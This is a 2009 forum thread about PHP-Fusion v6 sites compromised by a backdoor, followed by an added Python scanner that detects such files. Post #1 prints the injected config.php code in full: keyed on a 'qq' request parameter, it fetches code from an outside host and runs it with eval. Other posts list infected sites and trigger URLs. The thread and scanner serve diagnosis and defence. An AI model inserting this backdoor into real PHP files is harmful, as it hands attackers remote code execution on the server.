Thread subject: PHP-Fusion :: config.php phpfusion6 hacked

Posted by Lory on 04-01-2009 19:28
#1

the config.php file was hacked

I had this in my config.php file before the database setting

Code
<?php

if(isset($_GET['qq'])) {
$sock = @fsockopen('km20725.keymachine.de', 80);
if($sock){
fwrite ($sock, 'GET http://km20725.keymachine.de/prv/index.php?host='.$_SERVER['SERVER_NAME'].'&qq='.$_GET['qq'].' HTTP/1.0'."rn");
fwrite ($sock, 'Host: km20725.keymachine.de'."rnrn");
while($content[] = fgets ($sock));
$content = implode('', $content);
@eval(trim(substr($content, strpos($content, "rnrn"))));
fclose ($sock);}
}





on the domain www.ka-design.info


Edited by Lory on 05-01-2009 10:35

Posted by Lory on 04-01-2009 19:37
#2

look, same thing happens here..

http://www.christianiateater.no/news.php

http://www.christianiateater.no/?qq=41870 - hacked part

found on google

i41.tinypic.com/1zczk7l.gif

and these are just the last referers (last few minutes)

i42.tinypic.com/i3zxnm.gif

They do the same with wordpress

http://www.vitalheute.com/
http://www.vitalheute.com/?qq=231700


Edited by Lory on 04-01-2009 20:11

Posted by Lory on 05-01-2009 10:06
#3

Hm :) very interesting, lots of phpfusion sites hacked the same way, nobody says anything, just editing the first post so now it looks nice ;)

Posted by muscapaul on 05-01-2009 10:57
#4

Looking on Google along those lines, it appears they are all v6 sites. Possibly they were attacked earlier when they were vulnerable, and some of them may even still be vulnerable. Some sites appear to suffer either injected iframes or inserted weblink panels. These sites need to be cleaned with a full scan of the database and files on the server.

Posted by kneekoo on 05-01-2009 11:44
#5

The question is... Did you CHMOD 644 your config.php after you finished the install? I only wish I could get that answer from the rest of the "hacked" people as well.

Yes, accidents can happen where a hack gets in between updates, but generally these kinds of hacks reside in improper setups, which is basically the administrator's responsibility and recommended by the readme file. However, to avoid such situations we will add an extra check inside the core, just so we make sure config.php has the proper CHMOD.

Posted by AusiMods on 05-01-2009 12:47
#6

It's a fairly common hack, and not only fusion is being attacked by it but also other CMS and blog systems.
As kneekoo says, check your file permissions etc., as with correct permissions writing to the file is not so easy.

Posted by Lory on 05-01-2009 13:02
#7

my config.php is chmoded 644 all the time (after finished installation)

Posted by muscapaul on 05-01-2009 14:01
#8

If they manage to get access to custom pages on a v6 site it is academic: they can use the custom pages to CHMOD any file and write to it, if they want. In v7 that will require the admin password of the administrator, so it will be more difficult to do that.

Contact me if you want me to have a look at your site's files and database to see if anything is wrong. Preferably use IM.


Edited by muscapaul on 05-01-2009 14:03
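
Added example, not part of the original thread or of PHP-Fusion: a file scan of the kind recommended in posts #4 to #6, flagging PHP files that combine a remote fetch with eval() as in the snippet from post #1, and files with group/other write bits set. The regular expressions, function names and sample files are assumptions made for this illustration; as post #7 shows, a file can be mode 644 and still be modified, so the content check is reported separately from the permission check.

```python
import os, re, stat, tempfile

# Heuristics taken from the snippet in post #1: a remote fetch and an eval()
# in the same file, optionally gated on a request parameter such as ?qq=.
FETCH = re.compile(r"""\b(fsockopen|curl_exec|file_get_contents\s*\(\s*['"]https?:)""", re.I)
EVAL = re.compile(r"@?\beval\s*\(", re.I)
GATE = re.compile(r"isset\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)

def scan_file(path):
    """Return findings (loose permissions, fetch+eval) for one PHP file."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):   # group/other write bit set
        findings.append("writable by group/other (mode %o)" % mode)
    with open(path, "r", errors="replace") as fh:
        src = fh.read()
    if FETCH.search(src) and EVAL.search(src):
        gated = ", gated on request parameter" if GATE.search(src) else ""
        findings.append("remote fetch + eval" + gated)
    return findings

def scan_tree(root):
    """Map relative path -> findings for every .php file under root."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                hits = scan_file(full)
                if hits:
                    report[os.path.relpath(full, root)] = hits
    return report

def demo():
    """Scan a constructed two-file site (sample data, not from a real host)."""
    samples = {
        "config.php": ("<?php if(isset($_GET['qq'])) { $sock = @fsockopen("
                       "'host.example', 80); @eval(trim($c)); } $db_host='x';", 0o644),
        "news.php": ("<?php echo 'hello';", 0o666),
    }
    with tempfile.TemporaryDirectory() as root:
        for name, (body, mode) in samples.items():
            path = os.path.join(root, name)
            with open(path, "w") as fh:
                fh.write(body)
            os.chmod(path, mode)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Point `scan_tree()` at the web root; a hit is a lead for manual review, since legitimate code can also fetch and evaluate content.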